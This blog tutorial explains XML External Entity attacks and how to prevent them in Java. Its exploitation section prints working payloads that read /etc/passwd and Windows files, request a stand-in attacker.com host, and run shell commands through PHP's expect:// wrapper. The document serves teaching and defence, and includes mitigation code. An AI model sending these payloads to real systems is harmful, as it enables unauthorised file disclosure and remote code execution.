XML External Entities


Extensible Markup Language (XML) has an infamous feature called XML eXternal Entities (XXE). It is the most well-known XML attack vector: it had its own category (A4) in the 2017 edition of the OWASP Top 10, and in the 2021 edition it was folded into the Security Misconfiguration category.

This blog post explains how to exploit the vulnerability to gain access to sensitive data and also how to mitigate it.

Introduction

XXE lets an attacker craft a malicious XML document that, when parsed by a vulnerable XML parser, fetches data from outside the document itself. This data is then inserted as the content of an XML tag of your choosing. The data can be the contents of a file or the response to an HTTP request.

Oftentimes the contents of an XML tag are displayed back to you, for example in a web page. This way you can view any sensitive data you’ve gained using XXE.

As this feature is a part of the main XML standard, it is usually enabled by default and must be turned off manually in a parser-specific way.

Understanding XXE and DTD

What is a DTD?

A DTD is a Document Type Definition, which defines the structure and the legal elements and attributes of an XML document.

Using a DTD, independent groups of people can agree on a standard document format for exchanging data. Applications can use DTDs to verify that XML data corresponds to the specified format.

If the DTD is declared inside the XML file, it must be wrapped inside the <!DOCTYPE> declaration:

<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
    <to>Brian</to>
    <from>Jane</from>
    <heading>Reminder</heading>
    <body>Don't forget to bring my jacket!</body>
</note>

As you can see above, the DTD defines that there is a note element, which in turn has the child elements to, from, heading and body.
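
To make the "verify that XML data corresponds to the specified format" part concrete, here is a minimal Java sketch that validates two notes against the DTD above using the JDK's built-in parser. The class name DtdValidationDemo and the validate helper are made up for this illustration. Validation errors are collected in a list rather than thrown, which is just one possible design.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.ErrorHandler;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

// Hypothetical demo class; the name and helpers are not part of any library.
class DtdValidationDemo {
    // The internal DTD from the note example.
    static final String DTD =
        "<!DOCTYPE note [\n"
        + "<!ELEMENT note (to,from,heading,body)>\n"
        + "<!ELEMENT to (#PCDATA)>\n"
        + "<!ELEMENT from (#PCDATA)>\n"
        + "<!ELEMENT heading (#PCDATA)>\n"
        + "<!ELEMENT body (#PCDATA)>\n"
        + "]>\n";

    // A note that matches the DTD.
    static final String VALID = "<?xml version=\"1.0\"?>\n" + DTD
        + "<note><to>Brian</to><from>Jane</from>"
        + "<heading>Reminder</heading>"
        + "<body>Don't forget to bring my jacket!</body></note>";

    // Same DTD, but the required <body> element is missing.
    static final String INVALID = "<?xml version=\"1.0\"?>\n" + DTD
        + "<note><to>Brian</to><from>Jane</from>"
        + "<heading>Reminder</heading></note>";

    /** Parses the XML with DTD validation enabled and returns the validation errors. */
    static List<String> validate(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setValidating(true); // check the document against its DTD
        DocumentBuilder builder = factory.newDocumentBuilder();
        List<String> errors = new ArrayList<>();
        builder.setErrorHandler(new ErrorHandler() {
            @Override public void warning(SAXParseException e) { }
            @Override public void error(SAXParseException e) { errors.add(e.getMessage()); }
            @Override public void fatalError(SAXParseException e) throws SAXParseException { throw e; }
        });
        builder.parse(new InputSource(new StringReader(xml)));
        return errors;
    }

    public static void main(String[] args) throws Exception {
        System.out.println("valid note errors:   " + validate(VALID));
        System.out.println("invalid note errors: " + validate(INVALID));
    }
}
```

The first note should produce an empty error list, while the second should produce at least one error because the DTD requires a body element.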

Entities

Some characters have a special meaning in XML, like the less-than sign <, which marks the start of an XML tag. Another example is the & sign, which marks the start of an entity reference.

You may already know the HTML entity &nbsp;. This “non-breaking space” entity expands to a space character that does not allow a line break. Just like in HTML, entities in XML are expanded when the document is parsed by an XML parser.
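
Entity expansion is easy to observe with a harmless internal entity. The following Java sketch assumes the JDK's default DOM parser. The entity name owner and the class name EntityExpansionDemo are invented for the example. It declares an entity in the DTD and then reads back the expanded text.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

// Hypothetical demo class; not part of any library.
class EntityExpansionDemo {
    // "owner" is an internal entity: its value is declared inside the document.
    static final String XML =
        "<?xml version=\"1.0\"?>\n"
        + "<!DOCTYPE note [ <!ENTITY owner \"Jane\"> ]>\n"
        + "<note>From &owner; &amp; co: 1 &lt; 2</note>";

    /** Parses the XML and returns the text of the root element after entity expansion. */
    static String expand(String xml) throws Exception {
        DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
        Document doc = builder.parse(new InputSource(new StringReader(xml)));
        return doc.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        System.out.println(expand(XML)); // prints "From Jane & co: 1 < 2"
    }
}
```

The parser replaces &owner; with the declared value and the predefined entities &amp; and &lt; with their characters. An external entity works the same way, except that the replacement text comes from a URI instead of the document.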

Exploitation

Example code

Here are some examples of how to use XXE to read data from a variety of resources, courtesy of OWASP.

1) Reading /etc/passwd on Linux

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

2) Reading files on Windows

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>

3) Making HTTP requests

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]><foo>&xxe;</foo>

Step-by-step exploitation

Example application

Let’s say we have an application where you can leave notes that other people can read. An XML request to this application might look something like this:

<note>
    <to>Brian</to>
    <from>Jane</from>
    <heading>Reminder</heading>
    <body>Don't forget to bring my jacket!</body>
</note>

The application parses the XML request and displays a note from Jane with the heading “Reminder” and the body “Don’t forget to bring my jacket!”.

Our goal in this example will be to read the contents of the /etc/passwd file. It’s a convenient file to use because you can usually count on it existing on a Linux system. We want the contents of /etc/passwd to appear in the body section of the note.

Malicious request

If External Entities are enabled, a malicious note could be created like so:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE note [
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<note>
    <to>Brian</to>
    <from>Jane</from>
    <heading>Reminder</heading>
    <body>&xxe;</body>
</note>

As a result, the note to Brian will have the contents of /etc/passwd in its body.
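
The server side of this attack can be reproduced safely on your own machine. The Java sketch below is an assumption about how such a note application might parse its input, not the code of any real application. It uses a DocumentBuilderFactory with default settings and points the entity at a temporary file instead of /etc/passwd. The class XxeFileReadDemo and its helpers are hypothetical names.

```java
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

// Hypothetical demo class; not part of any library.
class XxeFileReadDemo {
    /** Builds the malicious note with the external entity pointing at systemId. */
    static String maliciousNote(String systemId) {
        return "<?xml version=\"1.0\"?>\n"
            + "<!DOCTYPE note [\n"
            + "  <!ENTITY xxe SYSTEM \"" + systemId + "\">\n"
            + "]>\n"
            + "<note><to>Brian</to><from>Jane</from>"
            + "<heading>Reminder</heading><body>&xxe;</body></note>";
    }

    /** Writes secret to a temp file, parses a note that references it, returns the body text. */
    static String readViaXxe(String secret) throws Exception {
        Path file = Files.createTempFile("xxe-demo", ".txt");
        try {
            Files.write(file, secret.getBytes(StandardCharsets.UTF_8));
            String xml = maliciousNote(file.toUri().toString());
            // Default factory settings: no hardening has been applied.
            DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
            Document doc = builder.parse(new InputSource(new StringReader(xml)));
            return doc.getElementsByTagName("body").item(0).getTextContent();
        } finally {
            Files.deleteIfExists(file);
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("body = " + readViaXxe("top-secret-token"));
    }
}
```

On a JDK whose XML defaults have not been tightened, the body comes back containing the file's contents, which is exactly what the attacker wants to see rendered in the note.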

Other attacks

PHP Remote Code Execution

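If the PHP “expect” extension is loaded, its expect:// stream wrapper lets an external entity run a shell command, which gives us Remote Code Execution (RCE). The following request runs the id command: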

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE creds [
    <!ENTITY xxe SYSTEM "expect://id" >
]>
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>

Custom attacks on various applications

It used to be possible to get Remote Code Execution in many different code editors due to an XXE flaw. It was patched quickly, but it’s an interesting read.

Fixing

The easiest option is to disable DTDs entirely. The following code is in Java:

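import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
// Reject any document that contains a DOCTYPE declaration.
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
DocumentBuilder builder = factory.newDocumentBuilder();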
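
To see what this setting does in practice, the sketch below wraps the same configuration in a small, hypothetical helper (DoctypeRejectedDemo.rejectsDoctype) and feeds it one document with a DOCTYPE and one without. It assumes the JDK's built-in parser, which understands this Apache feature name.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

// Hypothetical demo class; not part of any library.
class DoctypeRejectedDemo {
    static final String WITH_DOCTYPE =
        "<?xml version=\"1.0\"?>\n"
        + "<!DOCTYPE note [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>\n"
        + "<note><body>&xxe;</body></note>";

    static final String WITHOUT_DOCTYPE =
        "<?xml version=\"1.0\"?>\n<note><body>Hello</body></note>";

    /** Returns true if the hardened parser refuses to parse the document. */
    static boolean rejectsDoctype(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        DocumentBuilder builder = factory.newDocumentBuilder();
        try {
            builder.parse(new InputSource(new StringReader(xml)));
            return false; // parsed without complaint
        } catch (SAXParseException e) {
            return true;  // the DOCTYPE triggered a fatal parse error
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("with DOCTYPE rejected:    " + rejectsDoctype(WITH_DOCTYPE));
        System.out.println("without DOCTYPE rejected: " + rejectsDoctype(WITHOUT_DOCTYPE));
    }
}
```

The malicious note is refused before any entity is resolved, while ordinary XML without a DOCTYPE still parses. The parser's default error handler may also print the fatal error to standard error.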

If disabling the DTD is not an option, then you must configure the XML parser to disable external entities. For more detailed information, refer to OWASP’s cheat sheet on the topic.
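
As a rough sketch of that second option, the following Java code keeps DTDs allowed but switches off external entities and external DTD loading. The three feature names are the ones the JDK's built-in parser recognizes, and other parsers may need different settings. The class ExternalEntitiesDisabledDemo and its helpers are hypothetical, and a temporary file stands in for a sensitive file.

```java
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

// Hypothetical demo class; not part of any library.
class ExternalEntitiesDisabledDemo {
    /** Returns a builder that still accepts DTDs but does not fetch anything external. */
    static DocumentBuilder hardenedBuilder() throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Do not resolve external general entities such as &xxe;.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        // Do not resolve external parameter entities used inside the DTD.
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        // Do not load an external DTD subset.
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        return factory.newDocumentBuilder();
    }

    /** Parses a note whose entity points at a temp file holding secret; returns the body text. */
    static String bodyAfterHardening(String secret) throws Exception {
        Path file = Files.createTempFile("xxe-demo", ".txt");
        try {
            Files.write(file, secret.getBytes(StandardCharsets.UTF_8));
            String xml = "<?xml version=\"1.0\"?>\n"
                + "<!DOCTYPE note [ <!ENTITY xxe SYSTEM \"" + file.toUri() + "\"> ]>\n"
                + "<note><body>&xxe;</body></note>";
            Document doc = hardenedBuilder().parse(new InputSource(new StringReader(xml)));
            return doc.getElementsByTagName("body").item(0).getTextContent();
        } finally {
            Files.deleteIfExists(file);
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("body = \"" + bodyAfterHardening("top-secret-token") + "\"");
    }
}
```

With these features off, the document still parses, but the entity reference is skipped instead of being replaced with the file's contents.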

Conclusion

Any time you see XML used in an application, one of the first things to think about is whether it is vulnerable to an XXE attack. And when using XML in your own application, you should always verify that External Entities are disabled.

Heino Sass Hallik